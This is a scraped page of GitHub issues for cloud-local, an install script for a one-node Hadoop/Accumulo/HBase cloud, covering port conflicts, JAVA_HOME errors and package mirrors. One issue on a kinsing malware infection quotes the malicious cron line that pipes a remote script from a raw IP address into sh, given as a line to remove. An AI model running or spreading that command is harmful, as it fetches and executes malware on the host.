ccri / cloud-local Goto Github PK
View Code? Open in Web Editor NEWInstall script for a local 1 node cloud...no excuses folks
Install script for a local 1 node cloud...no excuses folks
The pkgs folder works ok for an existing cloud-local, but scripting up bits of top of cloud-local could be improved by a more global storage place than a particular install. One's ~/.m2/repo seems like a good place. If necessary, we could even deploy com.ccri.cloud-local:xyz:v artifacts for the things we download from mirrors. But if there's a different package cacheing proposal, that's fine too.
might as well just have one script i think?
It'll be quite handy to be able to run several of these on the same machine, concurrently, so we'll have to de-conflict ports. A port-offset type variable would probably be the easiest, from a usability standpoint, and perfectly useful. If it's possible to set things up so that the cloud can be stopped, a function can be called to change the ports, and then the cloud is restarted and works on the new ports, that'd be awesome.
recently, I have found the malware injection (kinsing) was infected in my servers using cloud-local. Still don't know exactly how it happens, however, we could do the following to remove it:
Detect its appearance:
sudo grep CRON /var/log/syslog
Remove the injection via cron:
$ crontab -e
Remove the line: wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
Set permission to not allow anyone write to the folder /var/tmp or /tmp (except for root or special users).
This is just needed action to remove it. The server is definitely compromised, therefore data will be impacted. If anyone knows more about it, please share.
A failed download dropped a 0 byte geomesa jar in ${ACCUMULO_HOME}/lib/ext
. pkg_geomesa-*
vars were commented out.
2 issues here:
When I run the bin/cloud-local.sh init
script , I am asked to login to my own machine (which serves as the hbase master) and provide the password when he complains about JAVA_HOME not set:
Starting hbase...
starting master, logging to /home/user/Documents/cloud-local/hbase-1.3.1/logs/hbase-user-master-ds-gpu11.out
OpenJDK 64-Bit Server VM warning: ignoring option PermSize=128m; support was removed in 8.0
OpenJDK 64-Bit Server VM warning: ignoring option MaxPermSize=128m; support was removed in 8.0
jb@ds-gpu11's password:
ds-gpu11: +======================================================================+
ds-gpu11: | Error: JAVA_HOME is not set |
ds-gpu11: +----------------------------------------------------------------------+
ds-gpu11: | Please download the latest Sun JDK from the Sun Java web site |
ds-gpu11: | > http://www.oracle.com/technetwork/java/javase/downloads |
ds-gpu11: | |
ds-gpu11: | HBase requires Java 1.7 or later. |
ds-gpu11: +======================================================================+
On my machine(the one used as hbase master), a proper version of java is installed and JAVA_HOME is not empty:
(base) jb@ds-gpu11:~/Documents/cloud-local$ java --version
openjdk 11.0.8 2020-07-14
OpenJDK Runtime Environment (build 11.0.8+10-post-Ubuntu-0ubuntu118.04.1)
OpenJDK 64-Bit Server VM (build 11.0.8+10-post-Ubuntu-0ubuntu118.04.1, mixed mode, sharing)
(base) jb@ds-gpu11:~/Documents/cloud-local$ echo $JAVA_HOME
/usr/lib/jvm/java-8-openjdk-amd64
so it is not clear to me why I get this error.
The error comes from /cloud-local/hbase-1.3.1/bin/hbase-config.sh where there is a check if JAVA_HOME is defined.
I believe that in cloud-local/hbase-1.3.1/conf/hbase-env.sh folder JAVA_HOME can be set (like described here: https://hbase.apache.org/book.html#quickstart in 2.2.3), but this file is overwritten every time you run the cloud-local.sh init command, so I dont see how I can specify this.
If I copy the exact same part of the script where it fails, and run it directly on my machine, it does not fail as JAVA_HOME is indeed recognized.
Any clue how I can specify JAVA_HOME variable correctly?
Thanks!!
Extra info: I believe these are all the scripts that call each other:
1)script to initiate the cloud environment on local node
/cloud-local/bincloud-local.sh init -->
2)calls script to start hbase
/cloud-local/hbase-1.3.1/bin/start-hbase.sh -->
3)calls script to start daemon:
"$bin"/hbase-daemon.sh --config "${HBASE_CONF_DIR}" start master $@
4)daemon is started:
~/Documents/cloud-local/hbase-1.3.1/bin/hbase-daemon.sh
5)From /cloud-local/hbase-1.3.1/bin/hbase-config.sh there is a check if JAVA_HOME is defined that fails .
Maybe warn? maybe continue?
If having issues accessing the accumulo web interface on a headless node do these 2 things:
#Should the monitor bind to all network interfaces -- default: false export
ACCUMULO_MONITOR_BIND_ALL="true"
now goto http://127.0.0.1/50095 on your host's web browser and things should work.
@tkunicki knows where the archive site is
Not filtering to a particular user means that the stop message about killing processes looks like it'll kill more than it actually will.
check ports before startup/configure
Cloud-local comes with Spark 2.2 (updated in e8b0ede#diff-06fa9e4b7ace9bf9ecc6510432619361 ) but Zeppelin 0.7.2 does not support Spark 2.2 as far as I can tell (Zeppelin displays an error message and this is confirmed by https://stackoverflow.com/questions/45789231/zeppelin-0-7-2-version-does-not-support-spark-2-2-0#45791664).
The current one (ibiblio) is really slow...but dependable...maybe use it as a fallback
see
Line 115 in 08f9901
Put accumulo instance and password in config file to prevent prompt
When invoking config.sh as part of cloud-local.sh, "exit 1" just ends the running script. But when sourcing it directly from cli to set up environment variables, it closes the existing terminal window.
So you can run bin/cloud-local.sh status
I wonder if that is really hard
This line in ports.sh looks like it's using the undefined variable origport
when it should be using port
.
It appears that many (all?) mirrors do not have hadoop 2.7.3 available.
It seems like it could be convenient to, instead of requiring the user to unset some collection of env vars by hand (e.g., CLOUD_HOME, HADOOP_HOME, etc), provide a command which unsets the ones that probably matter.
The following might be a reasonable start, and/or overkill:
unset ACCUMULO_HOME CLOUD_HOME HADOOP_COMMON_HOME HADOOP_HDFS_HOME HADOOP_HOME HADOOP_YARN_HOME KAFKA_HOME YARN_HOME ZOOKEEPER_HOME
Makes for a smaller download, should still work with (most versions of) Hadoop
Branch already started.
spark_DL_w.o.Hadoop (currently at commit c01cf83 )
This was @elahrvivaz 's idea while working on the f_withSpark branch.
If Spark is downloaded then people can use the spark-submit script/class against Yarn without even needing to run the Spark service. branch #f_withSpark has been started. Maybe a further feature would be running the Spark history service so the spark details can be viewed after jobs end.
Trying to build cloud-local for the first time, running ./bin cloud-local.sh init
. The packages for accumulo, hadoop, and zookeerer all save. When it tries to config hadoop I get the following errors:
mkdir: cannot create directory ‘/home/ccannon/devtools/cloud-local/hadoop-2.6.3/etc/hadoop’: File exists
mkdir: cannot create directory ‘/home/ccannon/devtools/cloud-local/zookeeper-3.4.6/conf’: File exists
Error: port 2181 is already taken
It seems that cloud-local now fails to deploy without $GEOSERVER_HOME
set.
nothing complex...just make them vars (e.g. accumulo version is 1.6.4, hadoop is 2.6.3, etc)
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.